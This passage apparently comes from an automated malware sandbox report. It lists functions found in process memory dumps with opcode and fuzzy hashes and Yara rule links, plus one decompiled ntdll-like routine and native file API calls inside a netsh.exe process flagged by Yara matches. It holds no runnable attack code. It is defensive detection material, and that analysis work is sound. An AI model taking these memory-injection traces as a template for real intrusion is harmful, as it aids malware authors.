Instruction Fuzzy Hash: 3E90026135100C03D14471A9C4147070006E7E0641F51C011A0014594DC656896577F5

Uniqueness

Uniqueness Score: -1.00%

Function 0123A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4fdb880889d5e0d320a7d50096e767798bba0776fa08c1ab73437766525bc5
Instruction ID: 9ad38a21e59f4317b83977eb942bcb8e40fac588b35a09ae91fe03bb3c080bae
Opcode Fuzzy Hash: ef4fdb880889d5e0d320a7d50096e767798bba0776fa08c1ab73437766525bc5
Instruction Fuzzy Hash: 5890027131144403D14471A9C44460B5005B7F0341F51C411E0415594CC6558856A365

Uniqueness

Uniqueness Score: -1.00%

Function 01239A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07be3b804ed044322a30d6798fa08ea743fba815f12891c87c40952f55d24c58
Instruction ID: 7d28e4e2de689823e2288c1f5c9f90e0b64a0ae1efa68c5d34563d9a83799823
Opcode Fuzzy Hash: 07be3b804ed044322a30d6798fa08ea743fba815f12891c87c40952f55d24c58
Instruction Fuzzy Hash: E990027131140803D10461A988087470005A7E0342F51C011A5154595EC6A5C8917675

Uniqueness

Uniqueness Score: -1.00%

Function 01239A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3624ff0b66f0e95e26803965efa4f07f179f4aac40c2381be6dd4e0d50bd8d0a
Instruction ID: fc2711773eb6a9abe521f6c615a1050365613bc7eb792c212edcd6fdbe45c672
Opcode Fuzzy Hash: 3624ff0b66f0e95e26803965efa4f07f179f4aac40c2381be6dd4e0d50bd8d0a
Instruction Fuzzy Hash: F090026131144843D14462A98804B0F4105A7F1242F91C019A4146594CC95588556765

Uniqueness

Uniqueness Score: -1.00%

Function 01239520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22ecd98a61a36991d2fa90b31115340d10075a466ae8c2b2f0799fef4e1f8e1
Instruction ID: e85df2e430c41a289dd6a847ddd09c5dd93a4a7062f1cc7815f2e2d1b3b38654
Opcode Fuzzy Hash: c22ecd98a61a36991d2fa90b31115340d10075a466ae8c2b2f0799fef4e1f8e1
Instruction Fuzzy Hash: 369002E1311144934504A2A9C404B0A4505A7F0241B51C016E10445A0CC5658851A279

Uniqueness

Uniqueness Score: -1.00%

Function 0123AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff926dc01c46ce3f5fecd132b7aeca94483c650d872728ff117d2b4d97e88e3
Instruction ID: b18357a0cf475ec413fe95d44d6a7426b4128b6fb0cf449529e34eea633e716c
Opcode Fuzzy Hash: 7ff926dc01c46ce3f5fecd132b7aeca94483c650d872728ff117d2b4d97e88e3
Instruction Fuzzy Hash: 42900271B1500413914471A988146464006B7F0781B55C011A0504594CC9948A5563E5

Uniqueness

Uniqueness Score: -1.00%

Function 01239560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
Instruction ID: e753e9f50a1518c6019cb204aa4cbdf2f27056831696f3cb01040d4d62a5b1e5
Opcode Fuzzy Hash: b6aee01493c9af98b0caa1fbd81ac5b8cfd7e637eede50775b65b42b48ac1853
Instruction Fuzzy Hash: A8900265331004030149A5A9460450B0445B7E6391391C015F14065D0CC66188656365

Uniqueness

Uniqueness Score: -1.00%

Function 012395F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
Instruction ID: 7cf0175dab6fb4c1699e69e0e3f5a63600c3f03c75d67e94120aa39be2e0d50e
Opcode Fuzzy Hash: c56f17ae192927fee59a1115c6328ae7bf2ffcc94230706576d9106088f21451
Instruction Fuzzy Hash: F790027131100C03D10861A988046860005A7E0341F51C011A6014695ED6A588917275

Uniqueness

Uniqueness Score: -1.00%

Function 01239730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
Instruction ID: 44eabc918a905e5b192d26be8bb28ad3f18c693803c569bf0ef7aef86015ebc0
Opcode Fuzzy Hash: 43ef813015ee18ee1f224d3cd63224f3aedfe9ea9c6a7732df41da1acde000f8
Instruction Fuzzy Hash: B890026171500803D14471A994187060015A7E0241F51D011A0014594DC6998A5577E5

Uniqueness

Uniqueness Score: -1.00%

Function 0123A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
Instruction ID: f9855ea6a87e2944f8db2543aee06ca7512bf9cec2e6ce8b6da43aee6f843189
Opcode Fuzzy Hash: 84f295e18a73088909f9b29bebb50ab137db6dc2b2f1d6fdb3319b119a014825
Instruction Fuzzy Hash: 60900271311004539504A6E99804A4A4105A7F0341B51D015A4004594CC59488616265

Uniqueness

Uniqueness Score: -1.00%

Function 01239760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
Instruction ID: fcae6725ae30b941970d872e3c1192af5bcc8cf4c129e2424458699fb0c3e6d2
Opcode Fuzzy Hash: 679781c9573efd65d524120f9dd20a6c9f3a1ff63e549c09e526018ee400eff4
Instruction Fuzzy Hash: 4190027131100803D10461A995087070005A7E0241F51D411A0414598DD69688517265

Uniqueness

Uniqueness Score: -1.00%

Function 01239770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
Instruction ID: 607398b2cde4261f751cfa95df18658252414ab62bf979482d2ba8a2d8aa4460
Opcode Fuzzy Hash: 556f2242bd64e68ba0de30b8e64bf5093e34daf7866774b925a124a457516800
Instruction Fuzzy Hash: CE90026131504843D10465A99408A060005A7E0245F51D011A10545D5DC6758851B275

Uniqueness

Uniqueness Score: -1.00%

Function 0123A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
Instruction ID: e4473885bdfce26e665148d878b0a3c52530828023e6d85eac06fe4dd8b6c7b6
Opcode Fuzzy Hash: 8d5e009d3cd0b5c6eaf9378496a698c2967ee8bde38e35c035652999cc83e56c
Instruction Fuzzy Hash: 8490027531504843D50465A99804A870005A7E0345F51D411A04145DCDC6948861B265

Uniqueness

Uniqueness Score: -1.00%

Function 01239610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
Instruction ID: e43ecb3685530caa43d5e2fb31062d116efc6eaf52e496bbcee4b29c676f0ab7
Opcode Fuzzy Hash: 5b52f6c111d67593e4ad1ff3057fb0f6dd75a651d8624e11c60012cef8ec3510
Instruction Fuzzy Hash: A690027171500C03D15471A984147460005A7E0341F51C011A0014694DC7958A5577E5

Uniqueness

Uniqueness Score: -1.00%

Function 01239650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
Instruction ID: ded07c4d42f7a2f989b96cc1dc89d444d0a7829a6f07f021fbe2747b812a2abb
Opcode Fuzzy Hash: cafc6a1d3c0546ae384004b736532b94361641df873c537ed72e0aa232763ac1
Instruction Fuzzy Hash: 2D90027131504C43D14471A98404A460015A7E0345F51C011A00546D4DD6658D55B7A5

Uniqueness

Uniqueness Score: -1.00%

Function 012396D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
Instruction ID: 3e7718c0d89cb804fa5212226b1e9685f07a3b3c29714d0516db79dd3476de0d
Opcode Fuzzy Hash: e0a1a093573f430bf60b475dbd21673ff1c2ab5e3a9ffa0facf5749e0bc0372a
Instruction Fuzzy Hash: 1190027131100C43D10461A98404B460005A7F0341F51C016A0114694DC655C8517665

Uniqueness

Uniqueness Score: -1.00%

Function 01239670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 34cd7fe7305ffc5b0ea7c027525731c456b5501dd8243def6266b843b3c66593
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0128FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0128FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0123CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01285720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01285720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0128fdda
0x0128fde2
0x0128fde5
0x0128fdec
0x0128fdfa
0x0128fdff
0x0128fe0a
0x0128fe0f
0x0128fe17
0x0128fe1e
0x0128fe19
0x0128fe19
0x0128fe19
0x0128fe20
0x0128fe21
0x0128fe22
0x0128fe25
0x0128fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0128FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0128FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0128FE2B

Memory Dump Source

Source File: 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
Instruction ID: 065aef102f4bbb02ca427a0d30b0395a288e00eb171473e1507fd6deb48c5d8b
Opcode Fuzzy Hash: 5defff4eef130f71e45086d412aa001a3b285fee44009b7b610df679a3075f75
Instruction Fuzzy Hash: E2F0F672210602BFEB282A86DC06F33BF5AEB44B30F144315F628561D1DBA2F87086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: netsh.exe PID: 6984 Parent PID: 3388 netsh.exeCOMMON

Executed Functions

Function 02DE7BA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DE3587,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DE3587,007A002E,00000000,00000060,00000000,00000000), ref: 02DE7BED

Strings

.z`, xrefs: 02DE7BDD, 02DE7BE8

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e53a22c0dcacf317383a1f09047bb5afe276455d6c2a6f33146a6c1d52231cef
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: D6F0B2B2210208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7C4C, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DE3742,5EB6D251,FFFFFFFF,02DE3401,?,?,02DE3742,?,02DE3401,FFFFFFFF,5EB6D251,02DE3742,?,00000000), ref: 02DE7C95

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 689fed5b608335febc4338a9ae75b9cb7abb815d0f2c3dc977a7c330a000176b
Instruction ID: c7fc1b7634e6e31e38c0db5adaac6056f1475f8da883f905bc7150a2ba3cadce
Opcode Fuzzy Hash: 689fed5b608335febc4338a9ae75b9cb7abb815d0f2c3dc977a7c330a000176b
Instruction Fuzzy Hash: 68F0F4B2210108ABCB08DF89DC81EEB77AAEF8C714F058248BE1D97251C634EC158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7C50, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DE3742,5EB6D251,FFFFFFFF,02DE3401,?,?,02DE3742,?,02DE3401,FFFFFFFF,5EB6D251,02DE3742,?,00000000), ref: 02DE7C95

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 0f04b12e1ef999d594fc6c5fd4433e05f64dea1e9e1c988c16ba7598a2856540
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 4CF0A4B6210208ABCB14DF89DC81EEB77ADEF8C754F158648BA1D97251D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7CCA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DE3720,?,?,02DE3720,00000000,FFFFFFFF), ref: 02DE7CF5

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5ed8816de2b6f2e9742c65977b0b7fa730eec64692d6e93a1af3d556b455f4b5
Instruction ID: ac53f53300f71f87cc85ef179b4babfa9f1361c84ad0e9259edb3bea3fd70f58
Opcode Fuzzy Hash: 5ed8816de2b6f2e9742c65977b0b7fa730eec64692d6e93a1af3d556b455f4b5
Instruction Fuzzy Hash: 78E01276210214BBDB10EBD4DC45F9777A9EF44B50F154895BE1D9B242C570EA108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE7CD0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DE3720,?,?,02DE3720,00000000,FFFFFFFF), ref: 02DE7CF5

Memory Dump Source

Source File: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 817e6e445ea517b66beb5be99b098adff71fab740b7477174e5e326098b4648a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 5AD01776200214ABDB10EB98CC85EA77BADEF88760F154499BA199B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 03959A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03959A5A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 998a575989969da40da8a6af95db059b6d12a34d5faafb71000906ef56b0d7ce
Instruction ID: 405ccfccf3a00bd55457e714e0167d03b885cf2802c72318bf61bb955884551e
Opcode Fuzzy Hash: 998a575989969da40da8a6af95db059b6d12a34d5faafb71000906ef56b0d7ce
Instruction Fuzzy Hash: BF90026131294842D200A56A4C14B07004597D0343F91C115A0244554CCE5988616561

Uniqueness

Uniqueness Score: -1.00%

Function 039599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 039599AA

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42baac05f708f91e9b6df4380f4dd0e69a44618d7a17703647ebb2dd53e7c944
Instruction ID: 75d4375c9e27b4834279ee8eed62f207a8951fa6fd55f271de8865614deb9044
Opcode Fuzzy Hash: 42baac05f708f91e9b6df4380f4dd0e69a44618d7a17703647ebb2dd53e7c944
Instruction Fuzzy Hash: D89002A134214C42D100A15A4414B060045D7E1341F91C015E1154554D8B5DCC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03959910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395991A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b846893eb41157248d086db31ac7b01e50686149c977d60daaa79950b9c9025f
Instruction ID: 62451f43b95041a17f1c29348a3c605fcb63c4320ef7fc8de2ed0b53cb10b9a4
Opcode Fuzzy Hash: b846893eb41157248d086db31ac7b01e50686149c977d60daaa79950b9c9025f
Instruction Fuzzy Hash: B89002B130214C02D140B15A4404746004597D0341F91C011A5154554E8B9D8DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 03959840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395984A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92e739dd5c0946b04bb1355a0ffbbb6405fc69ff14d252097bb5d2fe267fc804
Instruction ID: 1cf6471d384c01a42f9095f9680b39873498897317eb2f6db4f570dd5973727d
Opcode Fuzzy Hash: 92e739dd5c0946b04bb1355a0ffbbb6405fc69ff14d252097bb5d2fe267fc804
Instruction Fuzzy Hash: B4900261343189525545F15A44045074046A7E02817D1C012A1504950C8A6A9856E661

Uniqueness

Uniqueness Score: -1.00%

Function 03959860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395986A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b61c4cf1b29731301bb0f27159507952bb40a4c7a83a07027ca0384ff2aed88
Instruction ID: d95ca968d40d831e46a4dfc76c495bffa3552bd3753457a5252ec1e1287aca77
Opcode Fuzzy Hash: 2b61c4cf1b29731301bb0f27159507952bb40a4c7a83a07027ca0384ff2aed88
Instruction Fuzzy Hash: 7690027130214C13D111A15A4504707004997D0281FD1C412A0514558D9B9A8952B161

Uniqueness

Uniqueness Score: -1.00%

Function 03959780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395978A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d06938ea5a855ea31fb0cff0e30d6683c014e7c540067c7d7674c02691b9da38
Instruction ID: 915ef13da30fb5b709f2498b4c603ff60747d201d4a874cd6c066f156587dd0b
Opcode Fuzzy Hash: d06938ea5a855ea31fb0cff0e30d6683c014e7c540067c7d7674c02691b9da38
Instruction Fuzzy Hash: 1690026931314802D180B15A540860A004597D1242FD1D415A0105558CCE5988696361

Uniqueness

Uniqueness Score: -1.00%

Function 03959FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03959FEA

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9965fb1018ae6208be63a0b88895d06d02bc576786782506d2d498e867ecc688
Instruction ID: 184922ebf9dc8c7221d256b26c0eefeb807a9b9d8daea1beeb68f2e811694c30
Opcode Fuzzy Hash: 9965fb1018ae6208be63a0b88895d06d02bc576786782506d2d498e867ecc688
Instruction Fuzzy Hash: 7790027131228C02D110A15A8404706004597D1241F91C411A0914558D8BD988917162

Uniqueness

Uniqueness Score: -1.00%

Function 03959710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0395971A

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bcf84f3b4dc0738b80b1158d19c34f1817aad10bfb29f944d44166aeb43cd17
Instruction ID: 123995e416ad7dba747f690d3aba4ef7b03027e67ca8e2bfb8844d1425b4525c
Opcode Fuzzy Hash: 9bcf84f3b4dc0738b80b1158d19c34f1817aad10bfb29f944d44166aeb43cd17
Instruction Fuzzy Hash: 1090027130214C02D100A59A5408646004597E0341F91D011A5114555ECBA988917171

Uniqueness

Uniqueness Score: -1.00%

Function 039596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 039596DA

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50e29a10a418985acd49c3b3c5bf21b95bd4cfbdee994bc391206aba061dda12
Instruction ID: dcacc1cf9cf5317d44244a297bc57164d2da817d26e0691de44101d071f846b5
Opcode Fuzzy Hash: 50e29a10a418985acd49c3b3c5bf21b95bd4cfbdee994bc391206aba061dda12
Instruction Fuzzy Hash: 3490027130214C42D100A15A4404B46004597E0341F91C016A0214654D8B59C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 039596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 039596EA

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e3ec922e40f19041fe14001f01b59e78fe03ff0ffd439735123ced02689bc6f
Instruction ID: 6060b21b90c88aeece7bf4a5e67017373dcc19a791b007bb1beebd6a49a5c1dd
Opcode Fuzzy Hash: 1e3ec922e40f19041fe14001f01b59e78fe03ff0ffd439735123ced02689bc6f
Instruction Fuzzy Hash: 489002713021CC02D110A15A840474A004597D0341F95C411A4514658D8BD988917161

Uniqueness

Uniqueness Score: -1.00%

Function 039595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 039595DA

Memory Dump Source

Source File: 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp, Offset: 038F0000, based on PE: true

Associated: 00000003.00000002.499307692.0000000003A0B000.00000040.00000001.sdmp Download File
Associated: 00000003.00000002.499314479.0000000003A0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6084540ff7facda9abdf5cb95e12d60b8e5c9044b51d821eb24cc5e2cfa2c1e2
Instruction ID: db91124c80e9dbe5dc6a3a2c0c9a85b076b0e4bebf7f34f4dfe5f96200c384c1
Opcode Fuzzy Hash: 6084540ff7facda9abdf5cb95e12d60b8e5c9044b51d821eb24cc5e2cfa2c1e2
Instruction Fuzzy Hash: 519002A1303148034105B15A4414616404A97E0241B91C021E1104590DCA6988917165

Uniqueness

Uniqueness Score: -1.00%

